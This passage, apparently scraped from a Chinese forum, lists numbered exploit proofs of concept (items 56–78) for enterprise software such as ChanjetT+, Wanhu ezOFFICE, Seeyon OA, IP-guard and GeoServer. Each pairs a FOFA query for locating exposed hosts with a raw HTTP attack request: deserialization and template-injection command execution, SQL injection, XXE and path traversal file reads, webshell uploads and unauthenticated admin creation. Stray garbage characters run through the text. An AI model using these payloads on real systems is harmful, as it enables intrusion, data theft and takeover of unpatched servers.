8 u: r# ~1 k: G/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers9 B% g$ v/ r9 U. i+ }
# h/ a$ }4 O3 I/ |
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE' R* l% C' }% m" i. C+ t
FOFA: app="畅捷通-TPlus", [1 i  v6 K4 r' }# z1 e8 x& |
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
3 F/ @1 {0 {$ T1 d7 HHost: x.x.x.x
4 C4 Y' x. b9 \# z+ uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
1 b9 I6 F! B% n5 bContent-Type: application/json
6 F5 C# t* Z1 a; v& x( u! M1 r% c2 V
{, Z, A% ]2 d) t$ y9 k8 p+ F
  "storeID":{% j2 I9 ~4 ]6 H
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
) g! u$ Y) e4 f  @9 c   "MethodName":"Start",& s% \' Q& o" _, _
    "ObjectInstance":{
0 k, x$ ^; ]  [% i0 E       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
, y) x# ?6 E, n5 U$ I/ p        "StartInfo": {
' E! g$ y9 v+ }) ~; @3 u5 }! A, W           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"," X" Y0 J% _3 f) b
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
8 X: D. e& A  [4 v7 p! K       }4 ?% Q6 H" ]" ?! N0 G  C- d( J) B
    }
7 a4 v. S4 b  A# ^7 L& S1 s  }4 z7 c7 `, h7 U( F6 z0 m4 {7 Z
}
7 V, c9 K( q, I3 I5 o7 F3 n- s* _% L
) V0 Z" U( d- _7 B
57. 畅捷通T+ keyEdit.aspx SQL注入
1 Y" u" y9 a( ?  @# [1 H/ gFOFA:app="畅捷通-TPlus"
1 j# W4 D( W: A) U$ JGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
/ a6 M- H0 Z0 zHost: host+ X. b: x: [. Q9 D/ ?; W
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
6 x2 c9 x- E7 ?/ m/ G1 ~/ x- r$ d0 E0 uAccept-Charset: utf-8
) x$ M8 i0 O, nAccept-Encoding: gzip, deflate9 f. D; R# t& h
Connection: close$ ~9 j% n' v3 y( ]
% V6 d6 X9 C' S  A. B. ?! P: M) _( ^; Q

5 e7 L0 P; K7 f; [: P8 P, ~58. 畅捷通T+ KeyInfoList.aspx sql注入
/ F. V. j+ g$ ~FOFA:app="畅捷通-TPlus"+ f+ N( \# n7 ^: C6 d: P) l, t
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1  n7 U% T1 `9 N" W- ?  b
Host: your-ip
' `4 u- x) H8 ~* S, D% _7 p+ XUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
, T9 _8 {9 e9 g6 J' {Accept-Charset: utf-8
+ Q  F! P! ^/ b. K! r, MAccept-Encoding: gzip, deflate
* `' g$ c5 ^5 CConnection: close% G4 [$ X$ I5 U1 q" M1 K

. X! p6 `. O' m1 T- j- Y# Y4 d. [# ~
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
# H6 [3 d4 w2 {7 Q+ W* FFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
  D: L+ e8 Z9 xPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1( P+ W& n/ \( x, U8 J
Host: 192.168.86.128:9090
+ y2 D8 p6 v: iUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.361 g2 o4 d5 Q% o6 ~- g- T
Connection: close
4 _& ~! P4 F$ K" XContent-Length: 1669
& g" ?9 x3 q8 Z% A0 kAccept: */*
, x9 T3 Q$ d/ U1 k% V! i$ gAccept-Language: en, `( w- |; ?$ j1 s
Content-Type: application/x-www-form-urlencoded
5 K4 _$ G' m9 E* ?7 [7 FAccept-Encoding: gzip% a; D7 ]9 Q' l/ j$ U; F
) ?/ ^% A; Q8 D/ p
PAYLOAD
3 o# g0 }+ V6 [% B* D
) ]$ w9 f* H" Y) S- g# @* o
6 ^# Q! {# b0 G% o- `0 I/ F60. 百卓Smart管理平台 importexport.php SQL注入' c) g5 V/ G' F( O; z
FOFA:title="Smart管理平台"
" X5 }- Z$ j1 [+ a* \2 ]GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
: W, s/ p+ d5 \7 N7 _Host:+ @- P! g, z( o% m* e3 ]8 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36+ w3 C& c6 Q$ h3 f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& ^& `$ @1 T1 h- s/ W4 rAccept-Encoding: gzip, deflate
( n, A1 F2 }9 S! cAccept-Language: zh-CN,zh;q=0.9
4 }, U5 y" l+ B" ?) R1 A3 E$ ^Connection: close: b* ?) d$ l; O$ o/ {0 |
' I3 F( a  v2 [; z% }) R5 K

0 D& ]( d$ ?2 J# R0 `0 g61. 浙大恩特客户资源管理系统 fileupload 任意文件上传4 {# A7 b$ [$ x, k1 L3 w
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
0 B: \0 q- ?+ b6 dPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1) S: Z3 ]9 o+ G! \
Host: x.x.x.x$ H* E  Y) S9 q7 C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& T1 ^( V5 U9 M% P+ K8 UConnection: close: E0 X7 v/ }7 @# E/ p
Content-Length: 271 s# J/ S. F" B
Accept: */*
( k8 ?  \/ w9 i6 j2 u( qAccept-Encoding: gzip, deflate( i. v1 g' z4 N( |3 b+ J
Accept-Language: en. I1 f2 _' E* h" N
Content-Type: application/x-www-form-urlencoded* `) Y* k+ Z- h9 }1 H2 C4 I& Z4 M
9 C; b: n& u3 v  b& X& ~! k3 `
8uxssX66eqrqtKObcVa0kid98xa) e# ~! d7 t3 C  L! p- J
  v$ G& d) k8 {
# U0 k+ [  B; I& N2 \
62. IP-guard WebServer 远程命令执行
6 D8 p, ]. E/ r8 K1 M: {" hFOFA:"IP-guard" && icon_hash="2030860561"" c8 s4 C/ w- H. J! W0 {, u
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
1 Z5 p2 M, {/ U0 }. ?Host: x.x.x.x
; v+ z8 d- s' q# LUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.365 P: g% a1 N" ]; z% J% N
Connection: close
1 J8 I/ b( u* v9 _1 D( a2 FAccept: */*
4 o9 N# o, \  CAccept-Language: en" T+ a% J+ j# u) v
Accept-Encoding: gzip
) _2 e7 t* _) w6 W- n
1 J5 F* J$ r4 o$ q7 ?, a- Q; t
4 m- b8 C4 L. w访问
; ?5 C' \' V/ e, k) `3 N0 q  Y" p5 ^7 S3 ?1 J
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
) ~3 ~5 @7 N- J5 Q- h$ s$ c: aHost: x.x.x.x
) M* I% D0 z+ a  R- O% k/ `9 {5 K' [, Q5 s" x# X1 h/ W0 _

6 r1 C: ?% M/ b# P; m" o0 K63. IP-guard WebServer任意文件读取
# N) J% \. d7 y( D- W) F) p6 ?IP-guard < 4.82.0609.01 G2 [9 F; `& z% n* z! R! R
FOFA:icon_hash="2030860561"
! u# i) G/ L/ tPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1! @6 t" f' b% t
Host: your-ip
! R6 ]- D4 Y; E$ M- \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36' o" `6 G) z: _9 X/ q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. G% K/ e$ {7 f4 ^. x* sAccept-Encoding: gzip, deflate
; l( R! X, C7 i8 {3 L, `& |Accept-Language: zh-CN,zh;q=0.9: q! j+ \! r$ ^9 _: |
Connection: close
5 c- ?7 f& I, X; b" D0 ^! [Content-Type: application/x-www-form-urlencoded
( t0 y* o0 V) c
8 V- k  J) k) Z* f! Qpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A; A* w. S7 D. n* Z" n+ d
  ^) {5 b8 T# k( q3 V& G
64. 捷诚管理信息系统CWSFinanceCommon SQL注入3 g2 K- t# y5 U
FOFA:body="/Scripts/EnjoyMsg.js"
" }! z/ x5 J; i! i4 P2 e& m. fPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1( W0 U, L! @% j4 k. Y! s
Host: 192.168.86.128:9001
$ ?  J& s7 V% w- mUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36! C( ?" u4 r  H" K5 J
Connection: close
: B) K2 S+ h3 l9 W" A: E; D: AContent-Length: 369
5 X3 [- k( T; K( DAccept: */** g* ^) @2 D, ?. F3 y9 p% n" n
Accept-Language: en
. _) J* ?* I7 T  g, C% NContent-Type: text/xml; charset=utf-8, t* e6 S8 ?8 k- N
Accept-Encoding: gzip
/ x" f/ Z& m2 `0 q
" Z- x+ j$ b) G, o. l+ U  ~# Z# I% T<?xml version="1.0" encoding="utf-8"?>) D$ p# {3 ~6 H6 F! c" k9 {
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
" }( U$ d- s% R9 q<soap:Body>
% y4 B, m5 y  e/ Z  W    <GetOSpById xmlns="http://tempuri.org/">
4 D6 Y5 M% d. U7 H/ C% r      <sId>1';waitfor delay '0:0:5'--+</sId>
5 \1 }( k) j$ q    </GetOSpById>
- I6 S' Q7 `  a/ }  </soap:Body>
! @  t2 q" a- V</soap:Envelope>
8 M. A. q' \4 p3 a6 w3 X
0 e1 K* ]! f& p( }, A  B3 q' M: M9 O
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过6 P0 P/ L; L5 H- {- a
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"& h, w& J) ]' b" _" l, I
响应200即成功创建账号test123456/123456( \/ D6 d7 g2 V7 E$ L& }, Y
POST /SystemMng.ashx HTTP/1.1
3 I( M' F  h, L/ N* GHost:
" T% \3 K% I" ]) xUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)4 ~7 u, G9 k! ?
Accept-Encoding: gzip, deflate4 D1 u% ]7 [8 V; g$ Q
Accept: */*% v; P$ d; i5 `, q# ]3 o( u7 q
Connection: close+ w/ X  p- V# U, L% R3 z9 O
Accept-Language: en6 c- k  }5 ], H; m3 m' o7 m
Content-Length: 1741 |7 s& V  X8 S/ K% _. ]
% r8 r$ S! @* V) Q: R
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
, ~! |) G- S1 Q: j0 b
% }6 a  L8 a" @1 G# t! i8 U7 l0 l/ H: n  T
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
- }& s# O7 ~! wFOFA:app="万户ezOFFICE协同管理平台"
6 w! r6 \, z9 @2 i- b' e+ o3 J
! ]. z( J; E, ?( Z/ pGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
5 T+ F+ o$ L# L1 p. m1 O" ]  T! hHost: x.x.x.x
  I  R0 j, O5 `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.368 A0 k8 f- f: o5 o" T4 z
Connection: close6 l! l' q" K5 h& E( U+ W
Accept: */*# a' f- v, k( E1 ]- F$ u6 j7 o' x
Accept-Language: en8 D/ m1 J3 F$ P1 M0 h$ B
Accept-Encoding: gzip
7 g% O( k/ m; n0 l( ]+ F
- C/ ^  G5 z! B2 A2 u$ g4 u3 Y
% Z+ d0 H+ P# c& U. ?, y. e第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
) T% [3 D( ^- @  ?( W4 Q5 M! f6 F, m/ z& ]: i+ t
67. 万户ezOFFICE wpsservlet任意文件上传1 w! \" @) D5 q# A# ^
FOFA:app="万户网络-ezOFFICE"
7 o2 _, X$ y, [: u5 xnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型7 l4 @4 a3 N- m9 W/ w9 L/ M) J
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
1 P8 L/ I2 ]2 ]9 f  ]Host: x.x.x.x
# F( T6 S1 q$ pUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
) U' ]( h- y5 N7 P4 a& UContent-Length: 173
/ ]0 G/ A& m$ T  N5 U5 F) tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, E* G6 K) b, f, T& o7 `# j, o5 Q
Accept-Encoding: gzip, deflate8 f4 Q/ e: ]! F" e6 u! g
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3, T, j  |/ W/ p5 N. V2 W
Connection: close
+ c8 ~( S! j; O) h. w: S* f0 C' R* ?Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
5 l/ R& T5 x3 G1 qDNT: 15 K$ g+ c  S0 m
Upgrade-Insecure-Requests: 1
6 J$ O4 w8 a# k0 X7 N4 n: _+ U# c; ^
: j. w' N$ w" ]8 b--ufuadpxathqvxfqnuyuqaozvseiueerp- u+ z* ]6 e% d( s* L# L
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"7 d2 `1 A% d9 H! B& ~4 P* \

4 p. y9 A! b/ w9 ?5 @<% out.print("sasdfghjkj");%>' W3 q3 D* i' i  Q
--ufuadpxathqvxfqnuyuqaozvseiueerp--" N5 P3 K/ ]: E1 T+ ~0 s# b
/ W2 b6 r+ ?+ r' E0 _5 x! t

8 e( o: W5 j' v. g/ r. E& I文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
7 W  l# T5 v  J+ ]
) J8 }) |+ s" i/ f1 c! l: `- c0 s68. 万户ezOFFICE wf_printnum.jsp SQL注入7 u- g" c# ]: ~) d
FOFA:app="万户ezOFFICE协同管理平台"
3 l2 j6 \" D$ T% c4 i) ~$ aGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.19 m7 T1 n' F  K. `$ g7 F7 q
Host: {{host}}8 V1 }* q$ f/ f7 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.360 M  M, E. k6 {- R
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8/ H  e7 u2 F9 y; ]+ M
Accept-Encoding: gzip, deflate1 @6 W! J/ N, R; j+ V: R
Accept-Language: zh-CN,zh;q=0.9/ P4 Z: t7 C# W
Connection: close* w3 Z+ Q+ }! }8 |
& N+ ~$ h4 v7 _9 y
, L3 v! |1 \6 K' K
69. 万户 ezOFFICE contract_gd.jsp SQL注入% u5 A" d5 r+ B/ j0 h
FOFA:app="万户ezOFFICE协同管理平台"
1 O  ~$ r9 Q) d+ C8 Q: a; q. EGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
* P" ~; L( ^1 `! c" mHost: your-ip- ?7 T3 U- q2 Q
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36) e: K) @& O0 e' m2 ?% J# a
Accept-Encoding: gzip, deflate
  a# @& m2 F9 a- cAccept: */*
, }0 O; c' b! V  ]1 Q, [Connection: keep-alive, R5 J: {2 D# Q$ W/ N" [

5 \+ V8 J/ D2 E0 v7 X- C* A0 {
2 P5 C* n/ t  k70. 万户ezEIP success 命令执行* ?& a+ v4 q) \9 j2 r
FOFA:app="万户网络-ezEIP"
2 r* ]- o2 r. T, l6 _# LPOST /member/success.aspx HTTP/1.1
/ ?* M" l  Q8 a7 |* g% d0 X7 |Host: {{Hostname}}
, d7 @" ~" g5 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
/ j: _3 Z# o8 _% O" M9 QSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
) Y0 c' E: E+ AContent-Type: application/x-www-form-urlencoded# B; o9 ^6 }/ f( R+ h
TYPE: C
  F2 R; A( }0 l$ Y2 YContent-Length: 16702; p2 z( @8 o3 Q

' q8 G/ P, Z0 _1 Y__VIEWSTATE=PAYLOAD/ n$ y2 j# B; t( Y. W+ G* j

" ]4 |/ ~8 D" ?# n! H, P- w: s" I% _  y6 x
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入; [9 ^. \6 z4 E$ q3 Y* X# ~2 K
FOFA:body="PM2项目管理系统BS版增强工具.zip"3 I# c* D2 K. \# M  z5 n) j
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1! R6 \& U% G; ?2 h  t& c& P
Host: x.x.x.xx.x.x.x. r; W5 q& d* ]4 i5 j# V8 Y5 a
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
3 o; t' l' U# p/ _/ _4 OConnection: close7 p7 x" U4 @/ O& P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" K# ?6 g% r8 ]8 m$ QAccept-Encoding: gzip, deflate
6 J! Q7 [: d  v- C5 P/ MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  ~# O7 T  u. t, d, p$ EUpgrade-Insecure-Requests: 1
2 U! {5 t7 J/ X" D( ~: C8 U" `2 R
: Y6 o3 ?: W3 O
% ^- l7 o" x% W  o" Q) ]3 |72. 致远OA getAjaxDataServlet XXE0 v! F0 ?" B( P
FOFA:app="致远互联-OA"4 t9 ^6 I3 b4 B9 x
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.17 [. g0 b  n, U
Host: 192.168.40.131:8099
! d9 c; ~2 g& GUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
! @5 m8 y* K  U! `5 D# ~Connection: close
/ a3 Q2 i% L3 T2 VContent-Length: 583
) _2 R  F+ `% J2 V: I( EContent-Type: application/x-www-form-urlencoded$ a8 Y9 E' r% l7 T9 b' r
Accept-Encoding: gzip
! d% O7 k: z1 s; {9 E
1 {/ x( h) Y+ F$ C- P( l2 \+ vS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E: y9 j- W* _6 ?& S9 E8 k

8 ^$ b& G; |9 C$ b( w. b4 U/ T. a! {( A0 ]; ^2 _0 j
73. GeoServer wms远程代码执行& H  `% L! ]# L& @" K: N& O
FOFA:icon_hash=”97540678”
( B3 R+ e/ P+ v, QPOST /geoserver/wms HTTP/1.1
' A* V1 a3 X1 t" F% C* _5 bHost:9 \& U7 y9 h7 C8 T9 s% j+ Y" A  C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36, X0 Q- p/ f7 X, M* h* G, {
Content-Length: 19810 k& l, v( B% M0 D  {( n
Accept-Encoding: gzip, deflate
9 J# y2 v7 ~, b2 O/ ]' YConnection: close
# w, q/ Q6 E  f( BContent-Type: application/xml
  h, k" W. O+ L: n% h% CSL-CE-SUID: 3. x# J; {( B6 U5 S  b
  S2 t, A# T* o2 O# M+ L
PAYLOAD+ ^' ^0 D! K7 M2 t  ^7 k: N

: S( s' Z- w. l4 q
; i1 t2 A; Q& ?74. 致远M3-server 6_1sp1 反序列化RCE
" Q. p2 c- U% j+ R) bFOFA:title="M3-Server"
4 Z7 X; u: p4 Q. P' U" C7 uPAYLOAD+ o. p8 z- X2 z# b) P7 Y, c: f+ q

- {5 B3 [% O% j8 G! c& ~75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE7 ?6 p, p& _' K" e" L+ b* e
FOFA:app="TELESQUARE-TLR-2005KSH"
) P3 y3 z$ |9 E6 K1 @& p2 s4 CGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1; S9 X2 E4 d* O/ z% v) y- M
Host: x.x.x.x
5 x# O! ?) P) |/ a% lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, m* U6 n* R8 B% K" ?; b% b: mConnection: close  [6 b8 `( p; S3 m
Accept: */*/ P% u5 N9 Z9 @$ q1 P+ J8 C, ^
Accept-Language: en" R7 c9 g3 {6 u4 {$ G5 s
Accept-Encoding: gzip- ^  k+ [3 Z- `/ `
$ R3 F, o$ ^: u3 j: o1 e

  [. I% n' A6 q& V/ g& w0 B2 y" VGET /cgi-bin/test28256.txt HTTP/1.1
- C4 b% T( e7 gHost: x.x.x.x
* l* p2 B& @. I5 I7 {6 |1 w
* c: }& v! ^' ~! D8 {; G8 J' C( r4 R2 ^9 a' e& G& [& @: g
76. 新开普掌上校园服务管理平台service.action远程命令执行
% t8 z% J9 m! D3 PFOFA:title="掌上校园服务管理平台"
4 o2 R2 A# L% f- ~POST /service_transport/service.action HTTP/1.1
' T# `: h4 E- [* m9 Q5 o. R1 U+ Y1 k% bHost: x.x.x.x
+ _% B+ r" Z0 f: z  I! U# ]) rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
  G  Y- x& r& P8 ~8 X( N; ]Connection: close
7 S1 y; ?% {, R6 _Content-Length: 211% s- v- c, v2 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) a: U/ w: [' _8 P# p7 ^Accept-Encoding: gzip, deflate
2 \4 l  K5 q. @1 ]" h* l  q' aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) T# a4 I9 F" D' ]* _0 }
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4, [- Z* y# C* w7 E
Upgrade-Insecure-Requests: 1! ?2 }+ `: l5 a
  o& G+ ~4 l- z7 ?/ Y+ u4 H" E9 ]
{4 ]5 j/ c9 c0 V" N
"command": "GetFZinfo",2 D7 }' D- |/ W: A" I8 S" j7 T0 n5 K
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
  [& G7 }7 ~* h* q, {0 w9 W  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"0 v/ |6 K" R: Y! V
}
) _. X  r7 s; [3 [2 m5 e7 S4 o; c7 ^
& q' q& @* b$ d6 g+ ~
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
: a4 r+ K' ~6 A, }( H3 _) u4 sHost: x.x.x.x
6 l* J- `. h9 L( v! G) @! l
% U6 u8 h& K, i
+ C# h& {( O4 D: ]
  K9 v; s, \. [9 W+ P/ ^77. F22服装管理软件系统UploadHandler.ashx任意文件上传- D% l1 L! j3 M) w$ x; \0 O3 ^
FOFA:body="F22WEB登陆"
' J- D! N# I$ ~9 c4 C1 pPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.11 Q3 R: x. w) d
Host: x.x.x.x) ]$ p8 C6 n  C- u; `1 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.365 k" R, q: Z( V5 O
Connection: close8 l: E7 D+ B' Y7 v( B" q' Y% Q
Content-Length: 4334 B* J! H1 C" I1 s4 {: h
Accept: */*9 P7 f3 Y7 ?  k
Accept-Encoding: gzip, deflate
0 |# [  v5 q; J. O- U8 b8 T+ TAccept-Language: zh-CN,zh;q=0.9
, s8 e4 T6 c+ ]5 a# V# J. l7 N. _Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix, {# P: g( E$ T* F+ t
$ ?# Y; k2 v& E$ }/ l6 N1 S7 G
------------398jnjVTTlDVXHlE7yYnfwBoix% ~- q8 n* x) ~- r" ]
Content-Disposition: form-data; name="folder"+ O" @% w2 K7 t: \; k  M4 R1 s
* _) S( @8 J/ {/ K) T1 n# t9 U1 N
/upload/udplog
- ]1 Y, s9 W- p6 r5 n; h# {; `8 c------------398jnjVTTlDVXHlE7yYnfwBoix
, N# ^; i0 X8 p: d* pContent-Disposition: form-data; name="Filedata"; filename="1.aspx"4 l& o" M# m& M, i; [. }; I
Content-Type: application/octet-stream* J/ |/ z9 e. Q" h* P* o
$ e% ]. I6 O7 b5 a
hello1234567" H" y; [' H9 i* l# X
------------398jnjVTTlDVXHlE7yYnfwBoix$ e) E! S( t: S, H  A5 N: ?4 r2 ?8 h( H
Content-Disposition: form-data; name="Upload"  l% |/ a( K8 H5 B
. ?3 B( Z+ |6 Q: Y5 a9 y
Submit Query& Z/ m8 }7 C9 H" P) w$ v& f/ `
------------398jnjVTTlDVXHlE7yYnfwBoix--
% y+ F$ q8 N  W2 _3 f: }5 ~2 F% w  u% I7 N0 e7 m% @

! X% a( R' _- n. K78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
% X" R" x+ X3 A$ vFOFA:icon_hash="2001627082"' Q* _; `  o6 Y1 K( T3 v
POST /Platform/System/FileUpload.ashx HTTP/1.1, M% a' P; l# x. U# v% t$ M  v
Host: x.x.x.x0 k% L" o# D5 Q. [4 f- [* L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& j( L' y1 M. b9 D3 }/ p/ m$ @Connection: close
7 X: w" D9 Y8 U% N# P0 x) {Content-Length: 336
1 U. g: j6 U( w3 ~( T- gAccept-Encoding: gzip# q& j  S' p+ U3 u4 O* J( U: q4 {
